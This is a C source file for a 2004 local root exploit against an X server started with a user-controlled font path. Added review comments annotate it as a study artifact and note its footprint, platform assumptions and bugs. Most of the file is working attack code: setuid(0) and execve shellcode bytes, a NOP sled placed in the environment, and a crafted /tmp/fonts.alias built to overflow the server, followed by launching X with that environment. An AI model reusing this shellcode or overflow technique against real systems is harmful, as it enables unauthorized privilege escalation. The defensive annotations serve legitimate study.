
/* For educational purposes only                            */
/* Brought to you by bender2@lonestar.org   11.10.2004      */

/*
 * Historical (2004) proof-of-concept against an X server started with a
 * caller-supplied font path ("-fp /tmp", see main). It writes a crafted
 * /tmp/fonts.dir and /tmp/fonts.alias and hands a payload to the X server it
 * launches via the environment. Kept as a study artifact: for a defender the
 * value is in the footprint it leaves (two font files in /tmp, an X server
 * launched with "-fp /tmp", an oversized fonts.alias line) and in the
 * assumptions it makes (32-bit i386 Linux, executable stack and data, a
 * privileged X server that honours a user-supplied font path).
 *
 * Only <fcntl.h> is included (for O_CREAT/O_WRONLY). printf, strcpy, strcat,
 * strlen, write, close and execle are used without prototypes and main has no
 * return type, i.e. the file relies on pre-C99 implicit declarations and does
 * not build as written with a C99-or-later compiler.
 */
#include <fcntl.h>

#define NOPNUM 8000   /* size budget for the NOP sled plus payload placed in the environment */
#define ADRNUM 1058   /* bytes of the repeated 4-byte address written to /tmp/fonts.alias */

/* shellcode from LSD */
/*
 * 32-bit x86 Linux machine code (int $0x80 system calls). Both arrays below
 * are copied byte-for-byte into the environment string after the NOP sled.
 * NOTE(review): eax=0x17, ebx=0, trap -- presumably setuid(0) on i386 Linux
 * (syscall 0x17 == 23); confirm against the target's syscall table.
 */
char setuidcode[]=         /* 8 bytes                        */
    "\x33\xc0"             /* xorl    %eax,%eax              */
    "\x31\xdb"             /* xorl    %ebx,%ebx              */
    "\xb0\x17"             /* movb    $0x17,%al              */
    "\xcd\x80"             /* int     $0x80                  */
;

/*
 * execve-style payload (eax=0x0b). The two pushl comments are stale: they
 * quote the immediates of the LSD original ("//sh", "/bin"), but the bytes
 * actually pushed are the literal strings "//id" and "/tmp", so the path
 * built on the stack and passed in %ebx is "/tmp//id", not a shell.
 */
char shellcode[]=          /* 24 bytes                       */
    "\x31\xc0"             /* xorl    %eax,%eax              */
    "\x50"                 /* pushl   %eax                   */
    "\x68""//id"           /* pushl   $0x68732f2f            */
    "\x68""/tmp"           /* pushl   $0x6e69622f            */
    "\x89\xe3"             /* movl    %esp,%ebx              */
    "\x50"                 /* pushl   %eax                   */
    "\x53"                 /* pushl   %ebx                   */
    "\x89\xe1"             /* movl    %esp,%ecx              */
    "\x99"                 /* cdql                           */
    "\xb0\x0b"             /* movb    $0x0b,%al              */
    "\xcd\x80"             /* int     $0x80                  */
;

/*
 * Executed, not copied: main casts this array to a function pointer and calls
 * it to read the current stack pointer (movl %esp,%eax; ret). That requires
 * the data segment to be executable; on a system enforcing non-executable
 * data (NX / W^X) the call is expected to fault before anything is written.
 */
char jump[]=
    "\x8b\xc4"                /* movl   %esp,%eax           */
    "\xc3"                    /* ret                        */
;
  35.  
  36.  
/*
 * Builds the two font files and the environment described at the top of the
 * file, then replaces itself with the X server. The layout decisions below
 * are tied to the i386 stack: the code reads its own stack pointer via
 * jump(), stores it into a 4-byte array and derives the address it repeats
 * in fonts.alias from it, so any change to the locals or their order changes
 * what gets written. No return type, no return statement, and none of
 * open/write/execle is checked for failure.
 */
main(int argc,char **argv){
    char buffer[20000],adr[4],pch[4],*b,*envp[4];   /* pch, envp[2] and envp[3] are never used */
    int i,fd;


    /* Call the bytes of jump[] as a function: returns the caller's stack
     * pointer, offset by 16000. Storing it through (unsigned long*) into a
     * 4-byte char array assumes sizeof(unsigned long)==4 (ILP32); on LP64
     * this is an 8-byte store into a 4-byte object. */
    *((unsigned long*)adr)=(*(unsigned long(*)())jump)()+16000;

    /* The environment handed to execle is a single string: the NOP sled plus
     * payload assembled at buffer[2000] further down (no NAME= prefix). */
    envp[0]=&buffer[2000];
    envp[1]=0;

    /* Diagnostic only. The argument is the pointer adr+12000, not the value
     * stored in adr, and %x expects unsigned int: format/argument mismatch. */
    printf("adr: 0x%x\n",adr+12000);

    /* /tmp/fonts.dir: one entry ("1") naming aaaa.pcf with an XLFD-style name. */
    b=buffer;
    strcpy(buffer,"1\n");
    strcat(buffer,"aaaa.pcf -aaaa-fixed-small-a-semicondensed--1-1-1-1-a-1-iso1111-1\n");
    fd=open("/tmp/fonts.dir",O_CREAT|O_WRONLY,0666);   /* return value unchecked */
    write(fd,buffer,strlen(buffer));   /* this descriptor is never closed */

    /* /tmp/fonts.alias: ADRNUM bytes of the 4-byte address repeated, then
     * '\n'. This is the oversized line the X server's font-path code is meant
     * to mishandle (inferred from the file name and the "-fp /tmp" argument).
     * NOTE(review): nothing NUL-terminates buffer after the '\n', so the
     * strlen below runs into the uninitialized remainder of buffer
     * (undefined behaviour). */
    for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
    *b++='\n';

    fd=open("/tmp/fonts.alias",O_CREAT|O_WRONLY,0666);
    write(fd,buffer,strlen(buffer));
    close(fd);

    /* Environment string at buffer[2000]: a 0x90 (NOP) sled followed by
     * setuidcode then shellcode, NUL-terminated. The sled length subtracts
     * strlen(setuidcode) twice (looks like a copy/paste slip), and i is int
     * while strlen() yields size_t: signed/unsigned comparison. */
    b=&buffer[2000];
    
    for(i=0;i<NOPNUM-strlen(setuidcode)-strlen(setuidcode)-strlen(shellcode);i++) 
    *b++=0x90;
    for(i=0;i<strlen(setuidcode);i++) *b++=setuidcode[i];
    for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
    *b=0;

    /* Replace this process with the X server: display :0, font path /tmp,
     * the crafted environment. This only matters as a privilege escalation if
     * the server runs privileged and accepts a user-supplied -fp; a display
     * manager that controls the server's arguments, a patched server, or
     * non-executable stack/data each break the chain. execle does not return
     * on success; on failure main simply falls off the end. */
    execle("/usr/bin/X11/X","X",":0","-fp","/tmp",0,envp);
}